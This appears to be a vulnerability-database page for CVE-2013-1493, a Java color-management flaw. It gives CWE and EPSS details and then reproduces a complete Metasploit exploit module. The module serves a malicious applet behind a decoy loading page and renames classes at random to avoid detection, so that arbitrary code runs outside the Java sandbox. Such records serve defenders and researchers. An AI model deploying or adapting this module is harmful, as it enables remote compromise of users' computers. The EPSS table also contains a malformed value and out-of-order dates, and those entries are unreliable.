CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
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Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
The color management (CMM) functionality in the 2D component in Oracle Java SE 7 Update 15 and earlier, 6 Update 41 and earlier, and 5.0 Update 40 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (crash) via an image with crafted raster parameters, which triggers (1) an out-of-bounds read or (2) memory corruption in the JVM, as exploited in the wild in February 2013.
Improper Restriction of Operations within the Bounds of a Memory Buffer The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
10
AV:N/AC:L/Au:N/C:C/I:C/A:C
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
86.06%
–
–
2023-02-19
–
–
85.37%
–
–
2023-03-12
–
–
–
96.91%
–
2023-04-09
–
–
–
96.91%
–
2023-06-11
–
–
–
96.85%
–
2023-07-30
–
–
–
96.82%
–
2023-09-24
–
–
–
96.8%
–
2023-11-12
–
–
–
96.85%
–
2023-11-26
–
–
–
96.9%
–
2024-01-28
–
–
–
96.66%
–
2024-03-31
–
–
–
96.6%
–
2024-06-02
–
–
–
96.65%
–
2024-08-04
–
–
–
96.42%
–
2024-10-06
–
–
–
96.65%
–
2024-12-08
–
–
–
96.67%
–
2024-12-22
–
–
–
96.45%
–
2025-02-02
–
–
–
96.42%
–
2025-01-19
–
–
–
96.45%
–
2025-02-02
–
–
–
96.42%
–
2025-03-18
–
–
–
–
91.9%
2025-05-27
–
–
–
–
91.61%
2025-05-31
–
–
–
–
91.9%
2025-08-29
–
–
–
–
93.27%
2025-09-12
–
–
–
–
93.01%
2025-09-12
–
–
–
–
93.01,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({ :javascript => false })
def initialize( info = {} )
super( update_info( info,
'Name' => 'Java CMM Remote Code Execution',
'Description' => %q{
This module abuses the Color Management classes from a Java Applet to run
arbitrary Java code outside of the sandbox as exploited in the wild in February
and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
systems. This exploit doesn't bypass click-to-play, so the user must accept the java
warning in order to run the malicious applet.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Vulnerability discovery and Exploit
'juan vazquez' # Metasploit module (just ported the published exploit)
],
'References' =>
[
[ 'CVE', '2013-1493' ],
[ 'OSVDB', '90737' ],
[ 'BID', '58238' ],
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
[ 'URL', 'http://pastie.org/pastes/6581034' ]
],
'Platform' => [ 'win', 'java' ],
'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
'Targets' =>
[
[ 'Generic (Java Payload)',
{
'Platform' => 'java',
'Arch' => ARCH_JAVA
}
],
[ 'Windows x86 (Native Payload)',
{
'Platform' => 'win',
'Arch' => ARCH_X86
}
]
],
'DefaultTarget' => 1,
'DisclosureDate' => 'Mar 01 2013'
))
end
def setup
path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Init.class")
@init_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Leak.class")
@leak_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyBufferedImage.class")
@buffered_image_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyColorSpace.class")
@color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }
@init_class_name = rand_text_alpha("Init".length)
@init_class.gsub!("Init", @init_class_name)
super
end
def on_request_uri(cli, request)
print_status("handling request for #{request.uri}")
case request.uri
when /\.jar$/i
jar = payload.encoded_jar
jar.add_file("#{@init_class_name}.class", @init_class)
jar.add_file("Leak.class", @leak_class)
jar.add_file("MyBufferedImage.class", @buffered_image_class)
jar.add_file("MyColorSpace.class", @color_space_class)
metasploit_str = rand_text_alpha("metasploit".length)
payload_str = rand_text_alpha("payload".length)
jar.entries.each { |entry|
entry.name.gsub!("metasploit", metasploit_str)
entry.name.gsub!("Payload", payload_str)
entry.data = entry.data.gsub("metasploit", metasploit_str)
entry.data = entry.data.gsub("Payload", payload_str)
}
jar.build_manifest
send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
when /\/$/
payload = regenerate_payload(cli)
if not payload
print_error("Failed to generate the payload.")
send_not_found(cli)
return
end
send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
else
send_redirect(cli, get_resource() + '/', '')
end
end
def generate_html
html = %Q|<html><head><title>Loading, Please Wait...</title></head>|
html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
html += %Q|</applet></body></html>|
return html
end
end